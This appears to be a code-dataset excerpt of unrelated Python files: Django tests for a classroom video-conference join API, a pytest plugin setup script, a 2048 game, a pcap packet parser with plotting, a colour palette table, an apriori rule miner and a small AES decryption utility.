f"/api/classrooms/{classroom.id}/join/",
)
self.assertEqual(response.status_code, 401)
mock_get_meeting_infos.assert_not_called()
mock_join_request.assert_not_called()
@mock.patch.object(api, "join")
def test_api_bbb_join_classroom_user_logged_in(self, mock_join_request):
"""A logged-in user should not be able to join a classroom."""
user = core_factories.UserFactory(
first_name="Jane", last_name="Doe", email="jane.doe@example.com"
)
classroom = ClassroomFactory()
self.client.force_login(user)
response = self.client.patch(f"/api/classrooms/{classroom.id}/join/")
self.assertEqual(response.status_code, 401)
mock_join_request.assert_not_called()
def test_api_bbb_join_student(self):
"""Joining a classroom as student should return an attendee classroom url."""
classroom = ClassroomFactory(
meeting_id="21e6634f-ab6f-4c77-a665-4229c61b479a",
title="Classroom 1",
)
jwt_token = StudentLtiTokenFactory(
playlist=classroom.playlist,
consumer_site="consumer_site",
user__id="user_id",
)
response = self.client.patch(
f"/api/classrooms/{classroom.id}/join/",
data=json.dumps({"fullname": "John Doe"}),
content_type="application/json",
HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
)
self.assertEqual(response.status_code, 200)
self.assertIn(
"https://10.7.7.1/bigbluebutton/api/join?"
f"fullName=John+Doe&meetingID={classroom.meeting_id}&"
"role=viewer&userID=consumer_site_user_id&redirect=true",
response.data.get("url"),
)
def test_api_bbb_join_from_other_classroom(self):
"""
Joining a classroom using a resource token for another resource should not be allowed.
"""
classroom = ClassroomFactory(
meeting_id="21e6634f-ab6f-4c77-a665-4229c61b479a",
title="Classroom 1",
)
other_classroom = ClassroomFactory()
jwt_token = StudentLtiTokenFactory(
playlist=other_classroom.playlist,
consumer_site="consumer_site",
user__id="user_id",
)
response = self.client.patch(
f"/api/classrooms/{classroom.id}/join/",
data=json.dumps({"fullname": "John Doe"}),
content_type="application/json",
HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
)
self.assertEqual(response.status_code, 403)
def test_api_bbb_join_instructor(self):
"""Joining a classroom as instructor should return a moderator classroom url."""
classroom = ClassroomFactory(
meeting_id="21e6634f-ab6f-4c77-a665-4229c61b479a",
title="Classroom 1",
)
jwt_token = InstructorOrAdminLtiTokenFactory(
playlist=classroom.playlist,
consumer_site="consumer_site",
user__id="user_id",
)
response = self.client.patch(
f"/api/classrooms/{classroom.id}/join/",
data=json.dumps({"fullname": "John Doe"}),
content_type="application/json",
HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
)
self.assertEqual(response.status_code, 200)
self.assertIn(
"https://10.7.7.1/bigbluebutton/api/join?"
f"fullName=John+Doe&meetingID={classroom.meeting_id}&"
f"role=moderator&userID=consumer_site_user_id&redirect=true",
response.data.get("url"),
)
def test_api_bbb_join_instructor_no_fullname(self):
"""Joining a classroom without fullname parameter should return a 422."""
classroom = ClassroomFactory(
meeting_id="21e6634f-ab6f-4c77-a665-4229c61b479a",
title="Classroom 1",
)
jwt_token = InstructorOrAdminLtiTokenFactory(playlist=classroom.playlist)
response = self.client.patch(
f"/api/classrooms/{classroom.id}/join/",
HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
)
self.assertEqual(response.status_code, 400)
self.assertDictEqual(
{"message": "missing fullname parameter"},
response.data,
)
@mock.patch.object(api, "join")
def test_api_bbb_join_user_access_token(self, mock_join_request):
"""A user with UserAccessToken should not be able to join a classroom."""
organization_access = OrganizationAccessFactory()
playlist = PlaylistFactory(organization=organization_access.organization)
classroom = ClassroomFactory(playlist=playlist)
jwt_token = UserAccessTokenFactory(user=organization_access.user)
response = self.client.patch(
f"/api/classrooms/{classroom.id}/join/",
data=json.dumps({"fullname": "John Doe"}),
content_type="application/json",
HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
)
self.assertEqual(response.status_code, 403)
mock_join_request.assert_not_called()
def test_api_bbb_join_user_access_token_organization_admin(self):
"""An organization administrator should be able to join a classroom."""
organization_access = OrganizationAccessFactory(role=ADMINISTRATOR)
playlist = PlaylistFactory(organization=organization_access.organization)
classroom = ClassroomFactory(playlist=playlist)
jwt_token = UserAccessTokenFactory(user=organization_access.user)
response = self.client.patch(
f"/api/classrooms/{classroom.id}/join/",
data=json.dumps({"fullname": "John Doe"}),
content_type="application/json",
HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
)
self.assertEqual(response.status_code, 200)
self.assertIn(
"https://10.7.7.1/bigbluebutton/api/join?"
f"fullName=John+Doe&meetingID={classroom.meeting_id}&"
f"role=moderator&userID={organization_access.user_id}&redirect=true",
response.data.get("url"),
)
def test_api_bbb_join_user_access_token_playlist_admin(self):
"""A playlist administrator should be able to join a classroom."""
playlist_access = PlaylistAccessFactory(role=ADMINISTRATOR)
classroom = ClassroomFactory(playlist=playlist_access.playlist)
jwt_token = UserAccessTokenFactory(user=playlist_access.user)
response = self.client.patch(
f"/api/classrooms/{classroom.id}/join/",
data=json.dumps({"fullname": "John Doe"}),
content_type="application/json",
HTTP_AUTHORIZATION=f"Bearer {jwt_token}",
)
self.assertEqual(response.status_code, 200)
self.assertIn(
"https://10.7.7.1/bigbluebutton/api/join?"
f"fullName=John+Doe&meetingID={classroom.meeting_id}&"
f"role=moderator&userID={playlist_access.user_id}&redirect=true",
response.data.get("url"),
)
|
18,739 | 0b4cc06c209208d50d2b489fb0826e83c5a79442 | from __future__ import absolute_import
from .._hook import import_hook
@import_hook(__name__)
def value_processor(name, raw_name, raw_value):
return raw_value
del import_hook
del value_processor
|
18,740 | d42f1043a84ef25c8a38cd730063e27595f34120 | from setuptools import setup
from codecs import open
from os import path
import re
# Get the long description from the README file
with open(path.join('README.md'), encoding='utf-8') as f:
long_description = f.read()
# Get the version from the module
with open(path.join('pytest_parallel', '__init__.py'), encoding='utf-8') as f:
version = re.search(r'__version__ = \'(.*?)\'', f.read()).group(1)
# Get the install_requires from the Pipfile
with open(path.join('Pipfile'), encoding='utf-8') as f:
pkgs = re.search(r'^\[packages\]([^\[]*)', f.read(), re.M).group(1).strip()
pkg_pattern = re.compile(r'"?(.*?)"? = ["\'](.*?)["\']')
install_requires = [name if version == '*' else name + version
for (name, version)
in re.findall(pkg_pattern, pkgs)]
setup(
name='pytest-parallel',
version=version,
license='MIT',
description='a pytest plugin for parallel and concurrent testing',
long_description=long_description,
long_description_content_type='text/markdown',
url='https://github.com/browsertron/pytest-parallel',
author='Browsertron',
author_email='team@browsertron.com',
include_package_data=True,
install_requires=install_requires,
packages=['pytest_parallel'],
entry_points={
'pytest11': [
'parallel = pytest_parallel',
]
},
# For a list of valid classifiers, see https://pypi.org/classifiers/
classifiers=[
'Development Status :: 3 - Alpha',
'Intended Audience :: Developers',
'Topic :: Software Development :: Testing',
'Topic :: Software Development :: Quality Assurance',
'Topic :: Utilities',
'License :: OSI Approved :: MIT License',
'Framework :: Pytest',
'Operating System :: POSIX',
'Operating System :: Microsoft :: Windows',
'Operating System :: MacOS :: MacOS X',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.6',
],
)
|
18,741 | 024b48fa8fa55ade056ea02c2393d7d8f58ea85c | import sys
import os
from random import randint, shuffle
from const import *
import utils
# import pdb
class Tile:
def __init__(self, value=0):
self.__value = value
self.__moved = False
def set_value(self, value):
self.__value = value
def can_merge(self, tile):
return self.__value == tile.get_value() and not self.__moved
def merge(self):
self.__value *= 2
self.__moved = True
def get_value(self):
return self.__value
def reset_tile_round_end(self):
self.__moved = False
def set_random_value(self):
# Generate tile values
tile_value = 2 if randint(1, 10) < 10 else 4
self.__value = tile_value
class Game:
__score = 0
__startTiles = 2
def __init__(self, verbose_flag=True):
self.__board = {(i, j) : EMPTY
for i in range(BOARD_COLUMNS)
for j in range(BOARD_ROWS)}
self.__verbose = verbose_flag
def __get_empty_tiles(self):
''' Return list of empty tiles '''
empty_tiles = []
for pos, tile in self.__board.items():
if tile == EMPTY:
empty_tiles.append(pos)
return empty_tiles
def __generate_tile(self, num_of_tiles=1):
empty_tiles = self.__get_empty_tiles()
shuffle(empty_tiles)
for _ in range(0, num_of_tiles):
if not empty_tiles:
break
else:
pos = empty_tiles.pop()
self.__board[pos] = Tile()
self.__board[pos].set_random_value()
def __is_move_possible(self, tile_order, prev_tile_func):
for curr_pos in filter(lambda x: self.__board[x] != EMPTY, tile_order):
far_pos, pre_far_pos = self.__find_farthest_pos(curr_pos, prev_tile_func)
is_out_bound = utils.out_of_board(far_pos)
can_move = pre_far_pos != curr_pos
# pdb.set_trace()
if can_move or \
not is_out_bound and \
self.__board[curr_pos].can_merge(self.__board[far_pos]):
return True
return False
def __find_farthest_pos(self, pos, get_prev_tile_f):
prev_pos = pos
pos = get_prev_tile_f(*pos)
while not utils.out_of_board(pos) and self.__board[pos] == EMPTY:
prev_pos, pos = pos, get_prev_tile_f(*pos)
return pos, prev_pos
def __move_tiles(self, tiles_order, direction):
get_prev_tile_f = utils.GET_PREV_DICT[direction]
for curr_pos in filter(lambda x: self.__board[x] != EMPTY
, tiles_order):
# pdb.set_trace()
farthest_pos, prev_farthest_pos = \
self.__find_farthest_pos(curr_pos,
get_prev_tile_f)
if (utils.out_of_board(farthest_pos) or
not self.__board[farthest_pos].can_merge(self.__board[curr_pos])):
self.__board[curr_pos], self.__board[prev_farthest_pos] = \
EMPTY, self.__board[curr_pos]
else:
self.__board[farthest_pos].merge()
self.__board[curr_pos] = EMPTY
def return_board(self):
return self.__board
def get_next_moves(self):
moves = []
for direction in DIRECTION_LIST:
tiles_order = TILE_ORDER_DICT[direction]
prev_func = utils.GET_PREV_DICT[direction]
if self.__is_move_possible(tiles_order, prev_func):
moves.append(direction)
return moves
def print_board(self):
os.system('cls')
print('-'*BOARD_COLUMNS*5)
for (i, j) in TILES_UP_ORDER:
if self.__board[(i, j)] == EMPTY:
print(repr(0).rjust(4), end="|")
else:
print(repr(self.__board[(i, j)].get_value()).rjust(4), end="|")
if j+1 == BOARD_COLUMNS:
print("\n"+'-'*BOARD_COLUMNS*5)
def make_move(self, direction):
tiles_order = TILE_ORDER_DICT[direction]
self.__move_tiles(tiles_order, direction)
for pos in filter(lambda pos: self.__board[pos] != EMPTY, tiles_order):
self.__board[pos].reset_tile_round_end()
def start_game_human(self):
self.__generate_tile(START_TILES)
next_possibles_moves = self.get_next_moves()
while next_possibles_moves:
self.print_board()
direction = sys.stdin.read(1)
if direction not in DIRECTION_LIST or direction not in next_possibles_moves:
continue
self.make_move(direction)
self.__generate_tile()
next_possibles_moves = self.get_next_moves()
self.print_board()
if __name__ == '__main__':
g = Game()
g.start_game_human()
|
18,742 | 7c05416111d27faed6d85c2138d72a0f22bf8ff8 | import dpkt
import datetime
import socket
import matplotlib.pyplot as plt
import sys
import numpy as np
from dpkt.compat import compat_ord
#declared lists
timeList = []
portDestList = []
#passing args to variables for later
specIP = sys.argv[2]
specFile = sys.argv[1]
def main():
#get file name passed from 1st argument
file_name = sys.argv[1]
#get ip passed from 2nd argument
setIP = sys.argv[2]
#open file in read bytes, pass as f
with open(file_name, 'rb') as f:
#read pcap using module
pcap = dpkt.pcap.Reader(f)
#call extract function with arguments
extract(pcap, setIP)
#call graph function
plot()
#the next 12 lines are adapted from https://dpkt.readthedocs.io/en/latest/_modules/examples/print_http_requests.html#mac_addr
def mac_add(address):
#convert mac address in hex to readable format
return ':'.join('%02x' % compat_ord(b) for b in address)
#the next 7 lines are adapted from https://dpkt.readthedocs.io/en/latest/_modules/examples/print_http_requests.html#inet_to_str
def convert(inet):
#convert hex to readable format
try:
return socket.inet_ntop(socket.AF_INET, inet)
except ValueError:
return socket.inet_ntop(socket.AF_INET6, inet)
def extract(pcap, setIP):
#counter set to 0
packetCounter = 0
#create txt file in write mode
with open('out.txt', 'w') as O:
#the next 4 lines are adapted from https://jon.oberheide.org/blog/2008/10/15/dpkt-tutorial-2-parsing-a-pcap-file/
#for each timestamp in pcap
for timestamp, buf in pcap:
#extract ethernet frame
eth = dpkt.ethernet.Ethernet(buf)
#the next 11 lines are adapted from https://dpkt.readthedocs.io/en/latest/_modules/examples/print_http_requests.html#inet_to_str
#if none IP frame found
if not isinstance(eth.data, dpkt.ip.IP):
continue
#take data from ethernet frame
ip = eth.data
#if TCP packet found
if isinstance(ip.data, dpkt.tcp.TCP):
#pass data to object
tcp = ip.data
#if source ip matches argument ip
if convert(ip.src) == setIP:
# the next 8 lines are adapted from https://dpkt.readthedocs.io/en/latest/_modules/examples/print_http_requests.html#inet_to_str
#write timestamp to file
print >> O, 'Timestamp: ', str(datetime.datetime.utcfromtimestamp(timestamp))
#write MAC source to dest to file
print >> O, 'MAC: %s ---> %s %s' % (mac_add(eth.src), mac_add(eth.dst), eth.type)
#write IP source to dest in readable format to file
print >> O, 'IP: %s ---> %s' % (convert(ip.src), convert(ip.dst))
#write port source to dest to file
print >> O, 'Port: %s ---> %d \n' % (tcp.sport, tcp.dport)
#add timestamp to list
timeList.append(datetime.datetime.utcfromtimestamp(timestamp))
#add port dest to list
portDestList.append(tcp.dport)
#every packet found increment by 1
packetCounter +=1
#convert to string
z = str(packetCounter)
O.write('Total number of packets found ' + z)
#close file
O.close
def plot():
#GRAPH DESTINATION PORT AGAINST THE TIME STAMP OF THE PACKETS
#the next 10 lines are adapted from https://matplotlib.org/examples/pylab_examples/simple_plot.html
#size window
plt.figure(figsize=(10,5))
#label axis
plt.xlabel('TIMESTAMP')
plt.ylabel('DESTINATION PORT')
#plot lists
plt.plot(timeList,portDestList, 'ro', markersize=0.5)
plt.title('Displaying packets from source IP ' + specIP + ' within file ' + specFile)
plt.suptitle('TCP data')
plt.show()
main()
|
18,743 | 0f0e9627bb30db2529c8d77284bffc9b0dccbe64 | from pybtex.database import parse_file
import sys
import codecs
bib_data = parse_file(sys.argv[1])
# clean up bibtex
#del_keys = ['code', 'website', 'blog', 'media', 'talk']
#for e in bib_data.entries:
# for k in del_keys:
# if k in bib_data.entries[e].fields._dict.keys():
# del bib_data.entries[e].fields[k]
bib_data.to_file(sys.argv[2], "yaml")
|
18,744 | 02dac1fbc2447d598d693f9ab5283fd4c9abac92 | PALETTE = [
{
"name": "Ultramark U3501G Weiss",
"label": "ultramark-u3501g-weiss",
"hex": "#edf1f2"
},
{
"name": "Ultramark U3508G Schwarz",
"label": "ultramark-u3508g-schwarz",
"hex": "#0e1012"
},
{
"name": "Ultramark U3507G Mausgrau",
"label": "ultramark-u3507g-mausgrau",
"hex": "#606566"
},
{
"name": "Ultramark U3506G Kieselgrau",
"label": "ultramark-u3506g-kieselgrau",
"hex": "#868f96"
},
{
"name": "Ultramark U3509G Hellgrau",
"label": "ultramark-u3509g-hellgrau",
"hex": "#a7aeb9"
},
{
"name": "Ultramark U3512G Zitronengelb",
"label": "ultramark-u3512g-zitronengelb",
"hex": "#fbe708"
},
{
"name": "Ultramark U3514G Kanariengelb",
"label": "ultramark-u3514g-kanariengelb",
"hex": "#fdd518"
},
{
"name": "Ultramark U3517G Gelb",
"label": "ultramark-u3517g-gelb",
"hex": "#ffc100"
},
{
"name": "Ultramark U3519G Senfgelb",
"label": "ultramark-u3519g-senfgelb",
"hex": "#ffac00"
},
{
"name": "Ultramark U3523G Orange",
"label": "ultramark-u3523g-orange",
"hex": "#f06600"
},
{
"name": "Ultramark U3526G Hellrot",
"label": "ultramark-u3526g-hellrot",
"hex": "#d83e24"
},
{
"name": "Ultramark U3527G Purpurrot",
"label": "ultramark-u3527g-purpurrot",
"hex": "#c3281a"
},
{
"name": "Ultramark U3528G Rot",
"label": "ultramark-u3528g-rot",
"hex": "#c1141a"
},
{
"name": "Ultramark U3530G Kirschrot",
"label": "ultramark-u3530g-kirschrot",
"hex": "#b6171c"
},
{
"name": "Ultramark U3533G Preiselbeerrot",
"label": "ultramark-u3533g-preiselbeerrot",
"hex": "#8f1e24"
},
{
"name": "Ultramark U3534G Weinrot",
"label": "ultramark-u3534g-weinrot",
"hex": "#7e162b"
},
{
"name": "Ultramark U3536G Hellblau",
"label": "ultramark-u3536g-hellblau",
"hex": "#4ebde7"
},
{
"name": "Ultramark U3537G Himmelblau",
"label": "ultramark-u3537g-himmelblau",
"hex": "#00aac6"
},
{
"name": "Ultramark U3542G Wedgwoodblau",
"label": "ultramark-u3542g-wedgwoodblau",
"hex": "#009fd7"
},
{
"name": "Ultramark U3541G Blau",
"label": "ultramark-u3541g-blau",
"hex": "#008cc4"
},
{
"name": "Ultramark U3548G Dunkelblau",
"label": "ultramark-u3548g-dunkelblau",
"hex": "#005ca2"
},
{
"name": "Ultramark U3549G Ultramark Ultramarinblau",
"label": "ultramark-u3549g-ultramark-ultramarinblau",
"hex": "#00397a"
},
{
"name": "Ultramark U3552G Orientblau",
"label": "ultramark-u3552g-orientblau",
"hex": "#2b4b7c"
},
{
"name": "Ultramark U3553G Franzoesischblau",
"label": "ultramark-u3553g-franzoesischblau",
"hex": "#253b69"
},
{
"name": "Ultramark U3556G Apfelgruen",
"label": "ultramark-u3556g-apfelgruen",
"hex": "#77c241"
},
{
"name": "Ultramark U3558G Gelbgruen",
"label": "ultramark-u3558g-gelbgruen",
"hex": "#3ea600"
},
{
"name": "Ultramark U3560G Moosgruen",
"label": "ultramark-u3560g-moosgruen",
"hex": "#009648"
},
{
"name": "Ultramark U3559G Kleegruen",
"label": "ultramark-u3559g-kleegruen",
"hex": "#009246"
},
{
"name": "Ultramark U3563G Gruen",
"label": "ultramark-u3563g-gruen",
"hex": "#008754"
},
{
"name": "Ultramark U3564G Smaragdgruen",
"label": "ultramark-u3564g-smaragdgruen",
"hex": "#007837"
},
{
"name": "Ultramark U3565G Dunkelgruen",
"label": "ultramark-u3565g-dunkelgruen",
"hex": "#005534"
},
{
"name": "Ultramark U3566G Waldgruen",
"label": "ultramark-u3566g-waldgruen",
"hex": "#124a2d"
},
{
"name": "Ultramark U3569G Wasserblau",
"label": "ultramark-u3569g-wasserblau",
"hex": "#00868a"
},
{
"name": "Ultramark U3579G Violett",
"label": "ultramark-u3579g-violett",
"hex": "#5f3d94"
},
{
"name": "Ultramark U3576G Rosa",
"label": "ultramark-u3576g-rosa",
"hex": "#bb2666"
},
{
"name": "Ultramark U3580G Mandel",
"label": "ultramark-u3580g-mandel",
"hex": "#e6dec7"
},
{
"name": "Ultramark U3582G Beige",
"label": "ultramark-u3582g-beige",
"hex": "#ebce98"
},
{
"name": "Ultramark U3593G Braun",
"label": "ultramark-u3593g-braun",
"hex": "#432a1a"
},
{
"name": "Ultramark U3596G Silber metallic",
"label": "ultramark-u3596g-silber-metallic",
"hex": "#85888a"
},
{
"name": "Ultramark U3597G Gold metallic",
"label": "ultramark-u3597g-gold-metallic",
"hex": "#8e7339"
},
{
"name": "Ultramark U3598G Anthrazit metallic",
"label": "ultramark-u3598g-anthrazit-metallic",
"hex": "#4d4c48"
},
{
"name": "Ultramark U3501M Weiss",
"label": "ultramark-u3501m-weiss",
"hex": "#f7f7f9"
},
{
"name": "Ultramark U3508M Schwarz",
"label": "ultramark-u3508m-schwarz",
"hex": "#373739"
},
{
"name": "Ultramark U3507M Mausgrau",
"label": "ultramark-u3507m-mausgrau",
"hex": "#6b7071"
},
{
"name": "Ultramark U3509M Hellgrau",
"label": "ultramark-u3509m-hellgrau",
"hex": "#a9b0ba"
},
{
"name": "Ultramark U3512M Zitronengelb",
"label": "ultramark-u3512m-zitronengelb",
"hex": "#ffe61e"
},
{
"name": "Ultramark U3514M Kanariengelb",
"label": "ultramark-u3514m-kanariengelb",
"hex": "#ffd100"
},
{
"name": "Ultramark U3517M Gelb",
"label": "ultramark-u3517m-gelb",
"hex": "#ffbf00"
},
{
"name": "Ultramark U3519M Senfgelb",
"label": "ultramark-u3519m-senfgelb",
"hex": "#ffaf26"
},
{
"name": "Ultramark U3523M Orange",
"label": "ultramark-u352threem-orange",
"hex": "#ea6a2b"
},
{
"name": "Ultramark U3526M Hellrot",
"label": "ultramark-u3526m-hellrot",
"hex": "#d84a3c"
},
{
"name": "Ultramark U3529M Tomatenrot",
"label": "ultramark-u3529m-tomatenrot",
"hex": "#c53f3e"
},
{
"name": "Ultramark U3530M Kirschrot",
"label": "ultramark-u3530m-kirschrot",
"hex": "#b12d33"
},
{
"name": "Ultramark U3534M Weinrot",
"label": "ultramark-u3534m-weinrot",
"hex": "#753c44"
},
{
"name": "Ultramark U3537M Himmelblau",
"label": "ultramark-u3537m-himmelblau",
"hex": "#00b1cc"
},
{
"name": "Ultramark U3541M Blau",
"label": "ultramark-u3541m-blau",
"hex": "#008dc3"
},
{
"name": "Ultramark U3543M Brillantblau",
"label": "ultramark-u354threem-brillantblau",
"hex": "#0075b9"
},
{
"name": "Ultramark U3548M Dunkelblau",
"label": "ultramark-u3548m-dunkelblau",
"hex": "#005f9d"
},
{
"name": "Ultramark U3549M Ultramark Ultramarinblau",
"label": "ultramark-u3549m-ultramark-ultramarinblau",
"hex": "#324b83"
},
{
"name": "Ultramark U3550M Saphirblau",
"label": "ultramark-u3550m-saphirblau",
"hex": "#35446a"
},
{
"name": "Ultramark U3554M Lindgruen",
"label": "ultramark-u3554m-lindgruen",
"hex": "#87d242"
},
{
"name": "Ultramark U3558M Gelbgruen",
"label": "ultramark-u3558m-gelbgruen",
"hex": "#56a632"
},
{
"name": "Ultramark U3562M Verkehrsgruen",
"label": "ultramark-u3562m-verkehrsgruen",
"hex": "#00975f"
},
{
"name": "Ultramark U3564M Smaragdgruen",
"label": "ultramark-u3564m-smaragdgruen",
"hex": "#008350"
},
{
"name": "Ultramark U3565M Dunkelgruen",
"label": "ultramark-u3565m-dunkelgruen",
"hex": "#005e45"
},
{
"name": "Ultramark U3567M Tuerkis",
"label": "ultramark-u3567m-tuerkis",
"hex": "#00b0a6"
},
{
"name": "Ultramark U3571M Pink",
"label": "ultramark-u3571m-pink",
"hex": "#f797c8"
},
{
"name": "Ultramark U3579M Violett",
"label": "ultramark-u3579m-violett",
"hex": "#69509a"
},
{
"name": "Ultramark U3576M Rosa",
"label": "ultramark-u3576m-rosa",
"hex": "#bf3b6e"
},
{
"name": "Ultramark U3582M Beige",
"label": "ultramark-u3582m-beige",
"hex": "#edd09e"
},
{
"name": "Ultramark U3594M Braun",
"label": "ultramark-u3594m-braun",
"hex": "#54423a"
},
{
"name": "Ultramark U3596M Silber metallic",
"label": "ultramark-u3596m-silber-metallic",
"hex": "#a0a2a3"
},
{
"name": "Ultramark U3597M Gold metallic",
"label": "ultramark-u3597m-gold-metallic",
"hex": "#9c885b"
}
] |
18,745 | 222fc61551efdf46dba0ebfe2464a293257c1c7a | from apyori import apriori
import json
# min_support
# min_confidence
# min_lift
# max_length
def apriori_rules(data,desc_json):
desc_json = json.loads(desc_json)
import sys
reload(sys)
sys.setdefaultencoding('utf-8')
rows = data.split('\n')
if rows[-1]=="":
rows=rows[:-1]
rows = [x.split(",") for x in rows ]
desc = rows[0]
data = rows[1:]
dataset = []
for row in data:
set = []
for item in range (0,len(desc)):
if int(row[item])==0:
set.append(desc_json['answers'][item]+"=0")
else:
set.append(desc_json['answers'][item]+"=1")
dataset.append(set)
results = list(apriori(dataset,min_support=0.5,min_confidence=0.85))
ordered = [r.ordered_statistics for r in results]
order = [item for sublist in ordered for item in sublist]
rules = []
for item in order:
if len(item.items_base)>0:
rules.append({'items_base':[x for x in item.items_base], 'items_add':[x for x in item.items_add],'confidence':item.confidence,'lift':item.lift})
desc_json['rules']=rules
return desc_json
#
# f = open("/home/zuchens/pmoves_sample_data/multiple_choice_description.json",'rb')
# desc = f.read()
#
# f = open("/home/zuchens/pmoves_sample_data/multiple_choice_data.csv", 'rb')
# data = f.read()
#
# print apriori_rules(data,desc)
|
18,746 | 89a5f57f33661151cddbbb379c66cc1fcbfda143 | import math
while 1:
n=input()
if n==0:
break
s=map(int,raw_input().split())
m=0.0
for i in range(n):
m+=s[i]
m=m/n
a=0.0
for i in range(n):
a+=(s[i]-m)**2
a=(a/n)**0.5
print a |
18,747 | ae6f72e21ff8023016c8b836572c4f77cde95551 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import sys
from logging import Logger
import logging.config
from oh_my_logging.builders import LoggerBuilderFactory
from oh_my_logging.decorators import log_args
def setup_module(module):
global dictConfig
dictConfig = {
'version': 1,
'root': {
'level': 'DEBUG',
'handlers': ['memory'],
},
'handlers': {
'memory': {
'class': 'oh_my_logging.handlers.MemoryHandler',
'formatter': 'default',
},
},
'formatters': {
'default': {
'format': '%(message)s',
},
},
}
LoggerBuilderFactory.unsafe_clear()
LoggerBuilderFactory(dictConfig)
def test_log_args_on_function():
@log_args
def func(name, num):
pass
func('oh_my_logging', 123)
logger = LoggerBuilderFactory().builder(func).build()
assert logger.root.handlers[0].message == 'params: %s' % 'name=oh_my_logging, num=123'
|
18,748 | 2887629cf96dd05d69cc20730b4aa0cc581e1c1e | class C:
def __init__(self, v) :
self.value = v
def show(self) :
print(self.value)
def getValue(self) :
return self.value
def setValue(self, v) :
self.value = v
c1 = C(10)
# print(c1.value)
print(c1.getValue())
# c1.value = 20
c1.setValue(20)
# print(c1.value)
print(c1.getValue())
# c1.show()
|
18,749 | 273607772830403f0dd9bb262de5f57d0ab9b8ff | __all__ = ["factorySimClass", "factorySimEnv", "customModels", "baseConfigs", "creation", "routing", "rendering", "kpi", "factoryObject"] |
18,750 | da799f3aaf9c5d9543cf39fc167d30082e124d74 | from cy.Box import AESBox, Box
import pickle
import argparse
import sys
import os
def resource_path(relative_path):
""" Get absolute path to resource, works for dev and for PyInstaller """
try:
# PyInstaller creates a temp folder and stores path in _MEIPASS
base_path = sys._MEIPASS
except Exception:
base_path = os.path.abspath(".")
return os.path.join(base_path, relative_path)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='You Only Live Once!')
parser.add_argument('passcode', metavar='P', default=None, type=str, help='The passcode of life and death')
args = parser.parse_args()
root = resource_path('data')
files = [ f for f in os.listdir(root) if os.path.isfile(os.path.join(root, f)) ]
if len(files) > 0:
df = os.path.join(root, files[0])
with open(df, "rb") as fd:
crypt = Box.deserialize(pickle.load(fd), boxtype=AESBox)
crypt.decrypt(args.passcode)
fd.close()
with open(df, "wb") as fd:
pickle.dump(crypt.serialize(), fd)
fd.flush()
fd.close()
if crypt.encoding is not None:
with open('./decrypted', "w") as fd:
fd.write(crypt.data.decode(crypt.encoding))
fd.close()
else:
with open('./decrypted', "wb") as fd:
fd.write(crypt.data)
fd.close()
|
18,751 | c9480dcbfaba81527d1a68ab65ab245463a8ad76 | import re
import tqdm
import matplotlib.pyplot as plt
from kaldiio import ReadHelper, WriteHelper
def main():
output_dir = "my_data/noise_vector/sad/view"
for dset in ["train_si84_multi_sp", "test_A", "test_B", "test_C", "test_D"]:
print(f"Processing {dset}...")
suffix = re.sub("train_|test_", "", dset)
decode_dir = f"exp/tri3b_multi/decode_tgpr_{suffix}"
mfcc_dir = f"data/{dset}_hires"
# confidence
conf_list = []
with open(f"{decode_dir}/score_10/{dset}.ctm") as ctm_reader:
for line in ctm_reader:
uid, channel, start, duration, word, conf = line.strip().split()
conf_list += [float(conf)]
plt.hist(conf_list, alpha=0.5)
plt.savefig(f"{output_dir}/{dset}.conf.png")
plt.clf()
# weights
# weights_list = []
# with ReadHelper(f"ark: gunzip -c {decode_dir}/weights_1.0.gz |") as weights_reader:
# for uid, weights in tqdm.tqdm(weights_reader):
# weights_list += weights.tolist()
# plt.hist(weights_list, alpha=0.5)
# plt.savefig(f"{output_dir}/{dset}.weights.png")
# plt.clf()
if __name__ == "__main__":
main() |
18,752 | 150414f75be823573e350c48988545833b416f8e | # How can I get an specific id from html code with python?
inputTag = soup.find(attrs={"name": "stainfo"})
output = inputTag['value']
|
18,753 | 2dd83ff9e9ad7cf4189596146a6c0793d3636596 | # This Python file uses the following encoding: utf-8
'''
In England the currency is made up of pound, £, and pence, p, and there are eight coins in general circulation:
1p, 2p, 5p, 10p, 20p, 50p, £1 (100p) and £2 (200p).
It is possible to make £2 in the following way:
1×£1 + 1×50p + 2×20p + 1×5p + 1×2p + 3×1p
How many different ways can £2 be made using any number of coins?
'''
def coin_sum_combos(pence):
ways = [1] + [0] * pence
for coin in [1, 2, 5, 10, 20, 50, 100, 200]:
for i in range(len(ways) - coin):
ways[i + coin] += ways[i]
return str(ways[-1])
if __name__ == "__main__":
print(coin_sum_combos(200))
#prints 73682
|
18,754 | 72e4096f9129f329656069792e4b45ce009eb3ae | def more_paper_camo(request):
import math
feature_dict={}
movie_list =[]
import itertools as it
movie_list = [14,15] #movie ids for which you need to compute similarity based on MORE
for moviename in movie_list:
a_list_genre = []
a_list_sub_genre =[]
a_list_director =[]
a_list_based_on=[]
a_list_about =[]
a_list_movie_topics =[]
movie_1_vector = []
for i in Movie_Details.objects.filter(id=moviename):
print i.name
m1_string = i.genre
m1_genre = m1_string.split(',')
a_list_genre.append(m1_genre)
y1_string = i.sub_genre
m1_sub_genre = y1_string.split(',')
a_list_sub_genre.append(m1_sub_genre)
d1_string = i.director.encode('utf-8')
m1_director = d1_string.split(',')
a_list_director.append(m1_director)
ca1_string = i.cast.encode('utf-8')
m1_cast = ca1_string.split(',')
based_on1_string = i.based_on
m1_based_on = based_on1_string.split(',')
a_list_based_on.append(m1_based_on)
about1_string = i.about
m1_about = about1_string.split(',')
a_list_about.append(m1_about)
movie_topics_lda_string1 = str(i.movie_topics_lda)
movie_topics_lda1 = movie_topics_lda_string1.split(', ')
a_list_movie_topics.append(movie_topics_lda1)
rating1 = i.rating[:3]
theatre1 = i.theatre_release[:4]
list222=[]
a_set_genre = set([item for sublist in a_list_genre for item in sublist])
a_set_genre = list(a_set_genre)
a_set_sub_genre = set([item for sublist in a_list_sub_genre for item in sublist])
a_set_sub_genre = list(a_set_sub_genre)
a_set_director = set([item for sublist in a_list_director for item in sublist])
a_set_director = list(a_set_director)
a_set_based_on = set([item for sublist in a_list_based_on for item in sublist])
a_set_based_on = list(a_set_based_on)
